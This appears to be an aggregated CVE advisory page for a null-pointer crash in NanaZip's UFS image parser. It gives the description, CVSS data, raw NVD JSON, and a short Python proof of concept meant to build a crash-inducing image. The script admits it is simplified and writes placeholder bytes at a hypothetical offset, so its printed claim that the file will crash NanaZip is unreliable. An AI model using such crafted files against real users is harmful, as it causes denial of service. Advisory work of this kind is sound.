Security Vulnerability Report
CVE-2026-42442 CVSS 3.3 LOW

Published: 2026-05-12 20:16:41
Last Modified: 2026-05-13 16:26:30

Description

NanaZip is an open source file archiver. Versions from 5.0.1252.0 up to, but not including, 6.0.1698.0 contain a null-pointer dereference in the UFS/UFS2 filesystem image parser. The vulnerability is triggered when opening a crafted UFS image in which the root inode (inode 2) is set to IFLNK (symlink) instead of IFDIR (directory). The parser unconditionally treats the root inode as a directory without checking its type. When the symlink has an embedded target (small di_size), the directory data buffer is zero-length, and the first read from it dereferences a null pointer. This vulnerability is fixed in 6.0.1698.0.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

NanaZip >= 5.0.1252.0
NanaZip < 6.0.1698.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct
import os

# PoC for CVE-2026-42442
# Description: Generates a malformed UFS image structure to trigger the vulnerability.
# The vulnerability occurs when the root inode (inode 2) is crafted as a symlink (IFLNK)
# with a small size, causing a null-pointer dereference in NanaZip.


def create_malformed_ufs(filename):
    with open(filename, 'wb') as f:
        # Write dummy data to simulate file start
        f.write(b'\x00' * 1024)

        # UFS Inode Mode: 0xA000 represents IFLNK (Symbolic Link)
        # Normal root inode is 0x4000 (IFDIR - Directory)
        mode = 0xA000

        # Set di_size to a small value (e.g., 10 bytes).
        # This implies the symlink target is embedded in the inode,
        # resulting in a zero-length directory buffer when parsed as a directory.
        size = 10

        # Construct a simplified malicious inode structure
        # Format: Mode (4 bytes), Size (8 bytes) - simplified for demonstration
        # Real UFS inode structure is more complex, but these are the key fields.
        inode_header = struct.pack('>I', mode)  # Big-endian Mode
        inode_size = struct.pack('>Q', size)    # Big-endian Size

        # Write the malformed inode data at a hypothetical offset
        # In a real exploit, one would patch a valid UFS image at the correct offset for Inode 2.
        f.write(b'MALICIOUS_INODE_2')
        f.write(inode_header)
        f.write(inode_size)

    print(f"[+] Created malformed UFS image: {filename}")
    print("[+] Root inode crafted as Symlink with small size.")
    print("[+] Opening this file in vulnerable NanaZip versions will trigger a crash.")


if __name__ == "__main__":
    create_malformed_ufs("cve_2026_42442_poc.img")

References

https://github.com/M2Team/NanaZip/security/advisories/GHSA-8r4x-fx3w-ph77

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42442", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:41.393", "lastModified": "2026-05-13T16:26:29.697", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanaZip is an open source file archive. From 5.0.1252.0 to before 6.0.1698.0, a null-pointer dereference exists in the UFS/UFS2 filesystem image parser in NanaZip. The vulnerability is triggered when opening a crafted UFS image where the root inode (inode 2) is set to IFLNK (symlink) instead of IFDIR (directory). The parser unconditionally treats the root inode as a directory without checking its type, and when the symlink has an embedded target (small di_size), the directory data buffer is zero-length, causing a null-pointer dereference on the first read. This vulnerability is fixed in 6.0.1698.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/M2Team/NanaZip/security/advisories/GHSA-8r4x-fx3w-ph77", "source": "[email protected]"}]}}